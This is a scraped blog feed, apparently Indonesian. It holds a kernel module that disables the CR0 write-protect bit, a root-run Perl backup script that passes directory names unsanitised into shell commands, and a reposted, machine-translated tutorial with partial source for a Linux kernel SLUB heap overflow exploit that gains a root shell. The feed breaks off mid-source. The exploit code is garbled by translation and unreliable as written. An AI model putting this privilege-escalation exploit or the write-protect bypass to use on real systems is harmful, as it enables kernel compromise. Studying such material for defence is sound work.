modules<br /><br />clean:<br /> make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean<br />==========<br /><br /><br />berikut ini adalah potongan kode asm yang digunakan untuk memodifikasi wp bit pada register cr0 yang akan kita jalankan di kernel space<br /><br />=============================<br />__asm__ ("push %eax\n\t"<br /> "mov %cr0,%eax\n\t"<br /> "and $0x0FFFEFFFF,%eax\n\t"<br /> "mov %eax, %cr0\n\t"<br /> "pop %eax");<br />============<br /><br />here we go:<br />modify_cr0.c:<br />============<br />#include <linux/sched.h><br />#include <linux/kernel.h><br />#include <linux/module.h><br />static int ev1ls_cr0()<br />{<br />//ev1l's bypass cr0 trick();<br />asm volatile("push %eax\n\t"<br /> "mov %cr0,%eax\n\t"<br /> "and $0x0FFFEFFFF,%eax\n\t"<br /> "mov %eax, %cr0\n\t"<br /> "pop %eax");<br />return 0;<br />}<br /><br />void readcr0test()<br />{<br /> unsigned long cr0;<br /> cr0 = read_cr0(); <br /> printk("\n%lu",cr0);<br /> printk("\n%X",cr0);<br />}<br /><br />int init_module (void)<br />{<br />readcr0test();<br />ev1ls_cr0();<br />readcr0test();<br />return 0;<br />}<br /><br />void cleanup_module (void)<br />{<br />return 0;<br />}<br />============<br /><br />Makefile:<br />=======<br />obj-m += modify_cr0.o<br /><br />all:<br /> make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules<br /><br />clean:<br /> make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean<br /><br />=============<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-5513831867317272167?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-69944569785703763652012-02-13T09:16:00.000-08:002012-02-13T09:16:39.542-08:00well some kernel space buggy<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-fl0PZ1dw_aI/Tzk4s6DDckI/AAAAAAAAA5A/HGp6fTPXLeU/s1600/botnet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" width="700" src="http://2.bp.blogspot.com/-fl0PZ1dw_aI/Tzk4s6DDckI/AAAAAAAAA5A/HGp6fTPXLeU/s1600/botnet.jpg" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-6994456978570376365?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-14792225166623558672012-02-10T09:01:00.001-08:002012-02-10T09:01:55.015-08:00as always as usual.doing my job as sysadmin<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-GvHwi2eVrGs/TzVNatr7UgI/AAAAAAAAA44/dvk1vHeX2jg/s1600/botnet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-GvHwi2eVrGs/TzVNatr7UgI/AAAAAAAAA44/dvk1vHeX2jg/s1600/botnet.jpg" width="620" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-1479222516662355867?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-30551198020068216932012-02-10T04:21:00.001-08:002012-02-10T04:25:30.694-08:00auto backup all /home/$user/public_html to /root/backup_homeyep another perl to make easy my job as sysadmin.<br /><br /><br />===========<br />#!/usr/bin/perl <br />#AutoBackup all /home/$user/public_html to /root/backup_home<br />#by: ev1lut10n - the sysadmin<br />#special thanks to : Merikenin <br /><br />use POSIX;<br /><br />sub utama()<br />{<br />eval<br />{<br />$uid=getuid();<br />if($uid ne "0")<br /> {<br /> print "[-] Sorry you gotta be root to run this tool !!!\n";<br /> }<br /> else<br /> {<br /> system("mkdir /root/backup_home"); <br /> viewhome(); <br /><br /> }<br />}<br />}<br />sub viewhome<br />{<br />eval <br />{<br />open(PROSES_CACING, "ls /home |"); <br /> while (<PROSES_CACING>) <br /> { <br /> $tampilan = $_;<br /> $tampilan =~ s/^\s+//; <br /> $tampilan =~ s/\s+$//;<br />$cmd="cd /home/$tampilan/;tar czvf $tampilan.tgz public_html;mv $tampilan.tgz /root/backup_home"; <br /> system($cmd);<br /> }<br />close(PROSES_CACING);<br />print "\n[+] Backup done !!! please check /root/backup_home !\n";<br />}<br />}<br /> <br /> <br /> <br />sub str_replace {<br />eval<br /> {<br />my $replace_this = shift;<br /> my $with_this = shift; <br /> my $string = shift;<br /> <br /> my $length = length($string);<br /> my $target = length($replace_this);<br /> <br /> for(my $i=0; $i<$length - $target + 1; $i++) {<br /> if(substr($string,$i,$target) eq $replace_this) {<br /> $string = substr($string,0,$i) . $with_this . substr($string,$i+$target);<br /> return $string; #Comment this if you what a global replace<br /> }<br /> }<br /> return $string;<br />}<br />}<br /><br />utama();<br /><br />=========<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-3055119802006821693?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-63446072475794467102012-02-09T12:34:00.000-08:002012-02-09T12:34:52.612-08:00my old book is backafter moving from bogor- bandung-jakarta-tangerang-jakarta-bandung i lost my book, and now my book is back to my hand<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-HxzpnaIJZVs/TzQtpTeQlSI/AAAAAAAAA4w/CR59iOC6U0I/s1600/IMG00182-20120210-0329.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" width="1000" src="http://4.bp.blogspot.com/-HxzpnaIJZVs/TzQtpTeQlSI/AAAAAAAAA4w/CR59iOC6U0I/s1600/IMG00182-20120210-0329.jpg" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-6344607247579446710?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-26606139320310490882012-02-08T12:39:00.000-08:002012-02-08T12:40:35.430-08:00Linux Kernel Slub Overflowsource: <a href="http://www.cloud-sec.org%20/">www.cloud-sec.org </a><br /> Exploit linux kernel slub overflow<br /><br />I. Introduction<br /><br /> Kernel exploit more popular in recent years, the common core to mention the right of vulnerability can be divided into several categories: the null pointer reference, the kernel stack overflow, kernel slab overflow, kernel any address writable.<br />A null pointer dereference vulnerability easier to exploit, the typical example sock_sendpage, udp_sendmsg. But the new kernel security module no longer allow userspace the code map low memory<br />NULL pointer dereference once only dos, not to mention the right. CVE-2010-4258 kernel any address writable vulnerability can be a null pointer dereference<br />dos conversion to mention the right. The kernel stack overflow stack overflow relative userspace under better the exploit. Here the most difficult to exploit the kernel slab overflow. Slab of overflow in 2005, UNF<br />qobaiashi written paper to illustrate the slab exploit. Since then overflow study on the slab in the focus on the 2.4 kernel under 2.6 of the slab overflows have not seen the paper shared out.<br />Time in the kernel 2.6.22, the kernel in order to improve the performance of the slab, the introduction of the slub the design. For the slub overflow the paper has not been shared until Jon Oberheide released a CAN protocol<br />the slub overflow exploit, this is the first public use of slab overflow exploit in 2.6kernel ubuntu-10.04 2.6.32 kernel running. Jon Oberheide<br />The exploit due to the use of some of the advantages of the CAN code does not overflow the essence of the slub reflected in his blog article on the analysis of the slub overflow paper. In-depth study of the exploit<br />On the basis of, plus I debug the experience of the 2.4 kernel slab overflow, look slub overflow centos 5.2 + 2.6.32 environment, the test is successful.<br /><br />Second, the sample code:<br /><br /> In order to facilitate debugging, I wrote an LKM module, a new system calls to the kernel api interface, users can call.<br /><br /># Define BUFFER_SIZE 80<br /><br />asmlinkage long kmalloc_overflow_test (char * addr, int size)<br />{<br /> char * buff = NULL;<br /><br /> buff = kmalloc (BUFFER_SIZE, GFP_KERNEL);<br /> if (! buff) {<br /> printk ("kmalloc failed \ n");<br /> return -1;<br /> }<br /> printk ("[+] Got the object at 0x% p \ n", buff);<br /><br /> if (copy_from_user (buff addr, size)) {<br />printk ("copy_from_user failed \ n");<br /> kfree (buff);<br />return -1;<br /> }<br />printk ("% s \ n", buff);<br /><br /> return 0;<br />}<br />This code use kmalloc allocated 80 bytes of space, but did not check the size the size of the user to pass a value greater than the size value of 80 will have a kernel heap overflow.<br /><br />Third, the SLUB structure<br /><br /> the slub greatly simplifies the data structure of the slab kmem_cache the three queues on the slab removed completely full queue. The beginning of each slab slab management structure and management of empty obj<br />kmem_bufctl_t array. A slab slub management structure is as follows:<br /><br /> A slab of the structure:<br /><br /> + ------------------------------------------- +<br /> | Obj | obj | obj | ... | obj |<br /> + ------------------------------------------- +<br /> <br /> According to the above code fragment, after the overflow of an obj dirty data directly over the rear adjacent obj:<br /><br /> | First | second |<br /> + ------------------------------------------- +<br /> | Obj | obj | obj | ... | obj |<br /> + ------------------------------------------- +<br /> | ----- The overflow ---> |<br /><br /> When the kernel code to access the data structure in the overflow of obj, it will have the oops.<br /><br />Fourth, the the SLUB overflow method<br /><br /> Kernel to mention the right to the ultimate purpose is to trigger a kernel bug, and then control the path to the kernel to userspace prior arrangement good shellcode. Therefore, our general direction in the second obj<br />If there is a function pointer can be dirty data coverage userspace shellcode, and the user can call this function pointer, you will complete an elevated task. There is also a problem to be dealt with<br />Is how to guarantee that a bug in the code using kmalloc allocation obj and we want to overwrite a function pointer where obj is adjacent. Because only the two adjacent, in order to use the overflow data overwrite the function pointer.<br /><br />Let us assume that a data structure has been found in the kernel, just to meet the above requirements, as long as two obj is adjacent, you can complete the pointer cover. We know that a feature of the slab is<br />When a cache slab structure obj run out, the kernel will reallocate the slab, the new distribution slab obj to each other are adjacent:<br />Kmalloc () -> __kmalloc () -> __do_kmalloc () -> __cache_alloc () -> ____cache_alloc () -> cache_alloc_refill<br />() -> Cache_grow () -> cache_init_objs ()<br /><br />static void cache_init_objs (struct kmem_cache * cachep,<br />struct slab * slabp, unsigned long ctor_flags)<br />{<br />for (i = 0; i <cachep-> num; i + +) {<br />void * objp = index_to_obj (cachep, slabp, i);<br />slab_bufctl (slabp) [i] = i + 1;<br />}<br />slab_bufctl (slabp) [i - 1] = BUFCTL_END;<br />slabp-> free = 0;<br />}<br />Mentioned in front of the structure of the slab in a kmem_bufctl_t array, obj index point of each element inside an idle. Initialize a new slab, each kmem_bufctl_t<br />Elements in order of points adjacent to it next obj, so when the kernel re-allocation of a slab structure, allocated from the new slab obj are adjacent.<br /><br />SLUB is not also meet this feature? Carefully read the slub the code and found that it also satisfy this feature:<br />kmalloc () -> slab_alloc () -> __slab_alloc () -> new_slab ():<br />static struct page * new_slab (struct kmem_cache * s, gfp_t flags, int node)<br />{<br /> last = start;<br /> for_each_object (p, s, start, page-> objects) {<br /> setup_object (s, page, last);<br /> set_freepointer (s, last, p);<br /> last = p;<br /> }<br /> setup_object (s, page, last);<br /> set_freepointer (s, last, NULL);<br />}<br /># Define for_each_object (__p, __ s, __ addr, __ objects) \<br /> for (__p = (__addr); __ p <(__addr) + (__objects) * (__s) -> size; \<br /> __p + = (__s) -> size)<br />All obj this code to traverse a page is initialized:<br />static inline void set_freepointer (struct kmem_cache * s, void * object, void * fp)<br />{<br /> * (Void **) (object + s-> offset) = fp;<br />}<br />s-> offset is saved is a slab in the next idle obj offset set_freepointer function will be an obj an idle pointer to the next one obj. So the slub also meet this characteristic.<br /><br />Now we are in user space to find a way to continue to consume the slab run out of the existing slab, the slab of the newly allocated obj is continuous adjacent. How to consume slabs<br />We can still use the shmget system call, and it used the struct shmid_kernel structure, it is we want to overwrite a function pointer!<br /><br />ipc / shm.c:<br />sys_shmget-> ipcget-> ipcget_new-> newseg:<br />static int newseg (struct ipc_namespace * ns, struct ipc_params * params)<br />{<br /> struct shmid_kernel * shp;<br /><br /> shp = ipc_rcu_alloc (sizeof (* shp));<br />shp-> shm_file = file;<br />}<br />void * ipc_rcu_alloc (int size)<br />{<br />out = kmalloc (HDRLEN_KMALLOC + size, GFP_KERNEL);<br />}<br /><br />Therefore continue to call shmget in user space in the kernel constant drain on the slab size of 96. The example code assigned is 80 bytes, it will be allocated in the 96-sized slab,<br />It should be noted:<br />out = kmalloc (HDRLEN_KMALLOC + size, GFP_KERNEL);<br />Space station, has an 8 byte with shmget allocation obj preceding Therefore with the shmget assigned shmid_kernel structure will be as follows:<br /><br /> | ------ 96 ---------- ---------- | --------------- 96 ----- ------- |<br /> + ------------------------------------------------- -------------- +<br /> | HDRLEN_KMALLOC | shmid_kernel | HDRLEN_KMALLOC | shmid_kernel |<br /> + ------------------------------------------------- -------------- +<br /><br />Later covered skip the HDRLEN_KMALLOC bytes.<br /><br />Information on the slab in the kernel, you can get in / proc / slabinfo:<br />[Wzt @ localhost exp] $ cat / proc / slabinfo | grep kmalloc-96<br />kmalloc-96 922 924 96 42 1: tunables 0 0 0: slabdata 22 22 0<br />922 current active obj number of 924 is obj the number of all slab, so we can parse this file in the user space remaining in the current system obj number:<br />int check_slab (char * slab_name, int * active, int * total)<br />{<br /> FILE * fp;<br /> a char buff [1024], name [64];<br /> int active_num, total_num;<br /><br /> fp = fopen ("/ proc / slabinfo", "r");<br /> if (! fp) {<br /> given by the perror ("fopen");<br /> return -1;<br /> }<br /><br /> while (fgets (buff, 1024, fp)! = NULL) {<br /> sscanf (buff, "% s% u% u", name, & active_num, & total_num);<br /> if (! strcmp (slab_name, name)) {<br /> * Active = active_num;<br /> * Total = total_num;<br /> return total_num - active_num;<br /> }<br /> }<br /><br /> return -1;<br />}<br />Now write a code to call shmget, take a look at the new distribution of obj is not continuous, in order to facilitate the debugging, I modified the code of sys_shmget<br />Added a printk to print the address after the kmalloc. trigger the code fragment as follows:<br />trigger.c:<br />...<br /> shmids = malloc (sizeof (int) * (free_num + SLAB_NUM * 3));<br /><br /> fprintf (stdout, "[+] smashing free in the slab ... \ n");<br /> for (i = 0; i <free_num + SLAB_NUM; i + +) {<br /> if (! check_slab (SLAB_NAME, & active_num, & total_num))<br /> break;<br /><br /> shmids [i] = shmget (IPC_PRIVATE, 1024, IPC_CREAT);<br /> if (shmids [i] <0) {<br /> given by the perror ("shmget");<br /> return -1;<br /> }<br /> }<br /> base = i;<br /> fprintf (stdout, "[+] smashing% d total:% d active:% d free in:% d \ n",<br /> i, total_num, active_num, total_num - active_num);<br /><br /> fprintf (stdout, "[+] smashing adjacent slab ... \ n");<br /> i = base;<br /> for (; i <base + SLAB_NUM; i + +) {<br /> shmids [i] = shmget (IPC_PRIVATE, 1024, IPC_CREAT);<br /> if (shmids [i] <0) {<br /> given by the perror ("shmget");<br /> return -1;<br /> }<br /> }<br /> check_slab (SLAB_NAME, & active_num, & total_num);<br /> fprintf (stdout, "[+] smashing% d total:% d active:% d free in:% d \ n",<br /> i, total_num, active_num, total_num - active_num);<br />...<br /><br />[Wzt @ localhost exp] $. / Exp<br />[+] Mmaping kernel code at 0x41414141 ok.<br />[+] Looking for symbols ...<br />[+] Found commit_creds addr at 0xc0446524.<br />[+] Found prepare_kernel_cred addr at 0xc0446710.<br />[+] Setting up the exploit the payload ...<br />[+] Checking slab total: 840 the active: 836 free in: 4<br />[+] Smashing free in the slab ...<br />[+] Smashing 17 total: 840 the active: 840 free in: 0<br />[+] Smashing adjacent slab ...<br />[+] Smashing 117 total: 966 the active: 966 free in: 0<br /><br />Can see the dmesg information, new obj continuous.<br />[Wzt @ localhost exp] $ dmesg | tail-n 10<br />[+] Kmalloc at 0xdf1ea120<br />[+] Kmalloc at 0xdf1ea180<br />[+] Kmalloc at 0xdf1ea1e0<br />[+] Kmalloc at 0xdf1ea240<br />[+] Kmalloc at 0xdf1ea2a0<br />[+] Kmalloc at 0xdf1ea300<br />[+] Kmalloc at 0xdf1ea360<br />[+] Kmalloc at 0xdf1ea3c0<br />[+] Kmalloc at 0xdf1ea420<br />[+] Kmalloc at 0xdf1ea480<br /><br />ok, we have been able to obtain a continuous obj to use slub another feature: the FIFO, first select an obj released in the successive obj<br />And then immediately trigger a bug in the code, then that obj obj address for bug-free code to call kmalloc allocation is just released, when the overflow occurred, the dirty data will overwrite<br />It adjacent to the next obj. Use the following code to trigger:<br /><br />trigger.c:<br />...<br /> free_idx = i - 4;<br /> fprintf (stdout, "[+] free exist shmid with idx:% d \ n", free_idx);<br /> if (shmctl (shmids [free_idx], IPC_RMID, NULL) == -1) {<br /> given by the perror ("in shmctl");<br /> }<br /><br /> fprintf (stdout, "[+] trigger kmalloc overflow in% s \ n", SLAB_NAME);<br /> memset (buff, 0x41, sizeof (buff));<br />kmalloc_overflow_test (buff, SLAB_SIZE + HDRLEN_KMALLOC + sizeof (shmid_kernel));<br />...<br /><br />Here we will last four obj released dmesg you can see after the execution:<br /><br />[+] Kmalloc at 0xd3decc00<br />[+] Kmalloc at 0xd3decc60<br />[+] Kmalloc at 0xd3deccc0<br />[+] Kmalloc at 0xd3decd20<br />[+] Kmalloc at 0xd3decd80<br />[-] Kfree at 0xd3decc60<br />...............................<br />[+] Got object at 0xd3decc60<br />AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br /><br />After the the shmctl release out 0xd3decc60 address, the bugs kmalloc assigned address is also 0xd3decc60.<br /><br />[Wzt @ localhost exp] $ tail / proc / sysvipc / shm<br /> 0,819,225,001,024,314,800 500 500 500 500 0 0 1293098372<br />1094795585 1094795585 05001345228840 500 1094795585 1094795585 0 0 4294967295 252 0<br />1094795585 1094795585 0 1024 3148 0 0 500 500 500 500 0 0 1293098372<br /> 0,832,332,601,024,314,800 500 500 500 500 0 0 1293098372<br />Can see that in adjacent and 0xd3decc60, the next obj address 0xd3deccc0 shmid_kernel structure has been covering.<br /><br />Now we can cover a function pointer, just meet we need a function pointer in shmid_kernel<br /><br />ipc shared memory data structure of the struct shmid_kernel handled in the kernel:<br /><br />struct shmid_kernel / * private to the kernel * /<br />{<br /> struct kern_ipc_perm shm_perm;<br /> struct file * shm_file;<br /> unsigned long shm_nattch;<br /> unsigned long shm_segsz;<br /> time_t shm_atim;<br /> time_t shm_dtim;<br /> time_t shm_ctim;<br /> pid_t shm_cprid;<br /> pid_t shm_lprid;<br /> struct user_struct * mlock_user;<br />;}<br /><br />struct shmid_kernel {<br />. Shm_file = struct file {<br />F_op is = struct file_operations = {<br />. The mmap = ATTACKER_ADDRESS<br />}<br />}<br />}<br />Shmat system call is triggered:<br /><br />sys_shmat () -> do_shmat ():<br />long do_shmat (int shmid, char __ user * shmaddr, int shmflg, ulong * raddr)<br />{<br />user_addr = do_mmap (file, addr, size, prot, flags, 0);<br />}<br />do_mmap will be covered for the shellcode address.<br /><br />ok, now can write a complete exp, try first:<br />[Wzt @ localhost exp] $. / Exp<br />Execution system hang, look dmesg:<br />[+] Kmalloc at 0xd31752a0<br />[+] Kmalloc at 0xd3175300<br />[+] Kmalloc at 0xd3175360<br />[+] Kmalloc at 0xd31753c0<br />[+] Kmalloc at 0xd3175420<br />[+] Kmalloc at 0xd3175480<br />[+] Kmalloc at 0xd31754e0<br />[-] Kfree at 0xd31753c0<br />...............................<br />[+] Got object at 0xd31753c0<br />AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />BUG: unable to the handle the kernel NULL pointer dereference at (null)<br />IP: [<c04fc352>] ipc_has_perm +0 x46/0x61<br />* Pde = 00000000<br />The Oops: 0000 [# 1] the SMP<br />last sysfs file: / sys/devices/pci0000: 00/0000: 00:05.0 / local_cpus<br />Modules linked in: sys ipv6 autofs4 sunrpc ip_tables ip6_tables x_tables dm_multipath video output sbs sbshc battery ac parport_pc lp parport snd_intel8x0 snd_ac97_codec ac97_bus snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss ide_cd_mod button cdrom snd_pcm rtc_cmos serio_raw rtc_core rtc_lib snd_timer 8139too floppy snd 8139cp soundcore i2c_piix4 mii snd_page_alloc i2c_core pcspkr dm_snapshot dm_zero dm_mirror dm_region_hash dm_log dm_mod ata_piix libata sd_mod scsi_mod ext3 jbd uhci_hcd ohci_hcd ehci_hcd [last unloaded: microcode]<br /><br />Pid: 3.19 thousand, comm: exp Not tainted (2.6.32 # 2) Bochs is<br />EIP: 0060: [<c04fc352>] EFLAGS: 00010246 CPU: 1<br />EIP is at ipc_has_perm +0 x46/0x61<br />EAX: 00000000 EBX: 00000000 ECX: 00000000 EDX: d3175428<br />ESI: 000001f0 EDI: d33ebf30 EBP: 00000080 ESP: d33ebec8<br /> DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068<br />Process exp (pid: 3190, ti = d33eb000 task = dbe6ea30 task.ti = d33eb000)<br />Stack:<br /> d3175428 d33ebed0 00000004 00000000 00000000 00000000 00000000 00000000<br /><0> 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000<br /><0> 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000<br />The Call the Trace:<br /> [<c04f9cf3>]? Security_ipc_permission +0 xf/0x10<br /> [<c04f22e4>]? Do_shmat +0 xdc/0x349<br /> [<c04057da>]? Sys_ipc +0 xff/0x162<br /> [<c0402865>]? Syscall_call +0 x7/0xb<br />Code: 8c e4 82 c0 8b 92 d8 02 00 00 89 c7 8b 52 58 8b 72 04 31 d2 89 44 24 04 89 d0 f3 ab 8b 14 24 c6 44 24 08 04 8b 42 0c 89 44 24 10 <0f> b7 0b 8d 44 24 08 8b 53 04 50 89 of f0 55 e8 75 fb ff ff 83 c4,<br />EIP: [<c04fc352>] ipc_has_perm +0 x46/0x61 SS: ESP 0068: d33ebec8<br />CR2,: 0000000000000000<br />--- [End trace 7bbab7e881899412] ---<br />[Wzt @ localhost exp] $<br />The problem looks like selinux, it closed out in try:<br /><br />[Wzt @ localhost exp] $. / Exp<br />[+] Mmaping kernel code at 0x41414141 ok.<br />[+] Looking for symbols ...<br />[+] Found commit_creds addr at 0xc0446524.<br />[+] Found prepare_kernel_cred addr at 0xc0446710.<br />[+] Setting up the exploit the payload ...<br />[+] Checking the slab total: 798 active: 791 free in: 7<br />[+] Smashing free in the slab ...<br />[+] Smashing 5 total: 798 the active: 798 free in: 0<br />[+] Smashing adjacent slab ...<br />[+] Smashing 105 total: 924 the active: 924 free in: 0<br />[+] Free exist shmid with idx: 101<br />[+] The trigger kmalloc the overflow in kmalloc-96<br />[+] Shmid_kernel size: 80<br />[+] Kern_ipc_perm size: 44<br />[+] Shmid: 3,309,669<br />[+] Launching the root shell!<br />[Root @ localhost exp] # uname-a<br />Linux localhost.localdomain 2.6.32 # 2 SMP Thu Dec 23 14:59:36 CST 2010 i686 i686 i386 GNU / Linux<br />[Root @ localhost exp] #<br />Successful, and finally got a lovely root!<br /><br />Five, source:<br /><br /> exp.c<br />/ *<br /> * Linux kernel slub overflow test exploit<br /> *<br /> * By wzt <wzt.wzt@gmail.com><br /> *<br /> * /<br /><br /># Include <stdio.h><br /># Include <stdlib.h><br /># Include <string.h><br /># The include <unistd.h><br /># Include <fcntl.h><br /># The include <limits.h><br /># The include <inttypes.h><br /># The include <sys/types.h><br /># Include <sys/ipc.h><br /># Include <sys/sem.h><br /># Include <sys/shm.h><br /># Include <sys/mman.h><br /># Include <sys/stat.h><br /><br /># Include "syscalls.h<br /><br /># Define __ NR_kmalloc_overflow_test 59<br /><br /># Define KALLSYMS_NAME "/ proc / kallsyms"<br /># Define SLAB_NAME "kmalloc-96"<br /># Define SLAB_SIZE 96<br /># Define SLAB_NUM 100<br /><br /># Define IPCMNI 32768<br /># Define EIDRM 43<br /># Define HDRLEN_KMALLOC 8<br /><br />the struct the list_head {<br />struct the list_head * the next;<br />the struct the list_head * prev;<br />;}<br /><br />the struct the super_block {<br />struct list_head s_list;<br />unsigned int s_dev;<br />unsigned long s_blocksize;<br />unsigned char s_blocksize_bits;<br />unsigned char s_dirt;<br />uint64_t s_maxbytes;<br />void * s_type;<br />void * s_op;<br />void * dq_op;<br />void * s_qcop;<br />void * s_export_op;<br />an unsigned long the s_flags;<br />} The super_block;<br /><br />the struct the mutex {<br />unsigned int count;<br />unsigned int wait_lock;<br />struct list_head wait_list;<br />void * the owner;<br />;}<br /><br />the struct the inode {<br />struct list_head i_hash;<br />struct list_head i_list;<br />struct list_head i_sb_list;<br />struct list_head i_dentry_list;<br />unsigned long i_ino;<br />unsigned int i_count;<br />unsigned int i_nlink;<br />unsigned int i_uid;<br />unsigned int i_gid;<br />unsigned int i_rdev;<br />uint64_t i_version;<br />uint64_t the i_size;<br />unsigned int i_size_seqcount;<br />long i_atime_tv_sec;<br />long i_atime_tv_nsec;<br />long i_mtime_tv_sec;<br />long i_mtime_tv_nsec;<br />long i_ctime_tv_sec;<br />long i_ctime_tv_nsec;<br />uint64_t i_blocks;<br />unsigned int i_blkbits;<br />unsigned short i_bytes;<br />an unsigned short i_mode;<br />unsigned int i_lock;<br />struct mutex i_mutex;<br />unsigned int i_alloc_sem_activity;<br />unsigned int i_alloc_sem_wait_lock;<br />struct list_head i_alloc_sem_wait_list;<br />void * i_op;<br />void * i_fop;<br />struct super_block * i_sb;<br />void * i_flock;<br />void * i_mapping;<br />the char i_data [84];<br />void * i_dquot_1;<br />void * i_dquot_2;<br />struct list_head i_devices;<br />void * i_pipe_union;<br />unsigned int i_generation;<br />unsigned int i_fsnotify_mask;<br />void * i_fsnotify_mark_entries;<br />struct list_head inotify_watches;<br />struct mutex inotify_mutex;<br />} The inode;<br /><br />the struct the dentry {<br />unsigned int d_count;<br />unsigned int d_flags;<br />unsigned int d_lock;<br />int d_mounted;<br />void * d_inode;<br />struct list_head d_hash;<br />void * d_parent;<br />} The dentry;<br /><br />the struct file_operations {<br />void * the owner;<br />void * the llseek;<br />a void * the read;<br />void * the write;<br />a void * the aio_read;<br /> void * aio_write;<br />a void * fashion in which readdir;<br />void * the poll;<br />void * the ioctl;<br />void * unlocked_ioctl;<br />void * compat_ioctl;<br />void * the mmap;<br />a void * open;<br />void * the flush;<br />a void * release;<br />void * the fsync;<br />void * The aio_fsync;<br />void * the fasync;<br />void * lock;<br />void * sendpage;<br />void * get_unmapped_area;<br />void * check_flags;<br />void * flock;<br />void * splice_write;<br />void * splice_read;<br />void * setlease;<br />} Op,;<br /><br />the struct vfsmount {<br />struct list_head mnt_hash;<br />void * mnt_parent;<br />void * mnt_mountpoint;<br />void * mnt_root;<br />void * mnt_sb;<br />struct list_head mnt_mounts;<br />struct list_head mnt_child;<br />int mnt_flags;<br />const char * mnt_devname;<br />struct list_head mnt_list;<br />struct list_head mnt_expire;<br />struct list_head mnt_share;<br />struct list_head mnt_slave_list;<br />struct list_head mnt_slave;<br />struct vfsmount * mnt_master;<br />struct mnt_namespace * mnt_ns;<br />int mnt_id;<br />int mnt_group_id;<br />int mnt_count;<br />} Vfsmount;<br /><br />the struct the file {<br />struct list_head fu_list;<br />struct vfsmount * f_vfsmnt;<br />struct the dentry * f_dentry;<br />void * f_op is;<br />unsigned int f_lock;<br />unsigned long f_count;<br />} The file;<br /><br />struct kern_ipc_perm {<br />unsigned int lock;<br />int deleted;<br />int id;<br />unsigned int the key;<br />unsigned int uid;<br />unsigned int gid;<br />unsigned int cuid;<br />unsigned int cgid;<br />unsigned int mode;<br />unsigned int seq;<br />void * security;<br />;}<br /> <br />struct shmid_kernel {<br />struct kern_ipc_perm shm_perm;<br />struct file * shm_file;<br />unsigned long shm_nattch;<br />unsigned long shm_segsz;<br />time_t shm_atim;<br />time_t shm_dtim;<br />time_t shm_ctim;<br />unsigned int shm_cprid;<br />unsigned int shm_lprid;<br />void * mlock_user;<br />} Shmid_kernel;<br /><br />typedef int __ attribute__ ((regparm (3))) (* _commit_creds) (unsigned long cred);<br />typedef unsigned long __ attribute__ ((regparm (3))) (* _prepare_kernel_cred) (unsigned long cred);<br />_commit_creds commit_creds;<br />_prepare_kernel_cred prepare_kernel_cred;<br /><br />static inline my_syscall2 (long, kmalloc_overflow_test, char *, addr, int, size);<br /><br />int __ attribute__ ((regparm (3)))<br />kernel_code (struct file * file, void * vma)<br />{<br />commit_creds (prepare_kernel_cred (0));<br />return -1;<br />}<br /><br />unsigned long find_symbol_by_proc (char * file_name, char * symbol_name)<br />{<br /> FILE * s_fp;<br /> char buff [200];<br /> char * p = NULL, * p1 = NULL;<br /> an unsigned long addr = 0;<br /><br /> s_fp = fopen (file_name, "r");<br /> if (s_fp == NULL) {<br /> printf ("open% s is failed \ n", file_name);<br /> return 0;<br /> }<br /><br /> while (fgets (buff, 200, s_fp)! = NULL) {<br /> if (of strstr (buff symbol_name) = NULL) {<br /> buff [strlen (buff) - 1] = '\ 0';<br /> p = strchr (the strchr (buff, '') + 1, '');<br /> + + P;<br /><br /> if (! p) {<br /> return 0;<br /> }<br /> if (! strcmp (p, symbol_name)) {<br /> p1 = the strchr (buff, '');<br /> * P1 = '\ 0';<br /> sscanf (buff, "% lx", & addr);<br /> / / Addr = strtoul (buff, NULL, 16);<br /> printf ("[+] found% s, addr at 0x% x \ n",<br /> symbol_name, addr);<br /> break;<br /> }<br /> }<br /> }<br /><br /> fclose (s_fp);<br /> return addr;<br />}<br /><br />int check_slab (char * slab_name, int * active, int * total)<br />{<br />FILE * fp;<br />a char buff [1024], name [64];<br />int active_num, total_num;<br /><br />fp = fopen ("/ proc / slabinfo", "r");<br />if (! fp) {<br />given by the perror ("fopen");<br />return -1;<br />}<br /><br />while (fgets (buff, 1024, 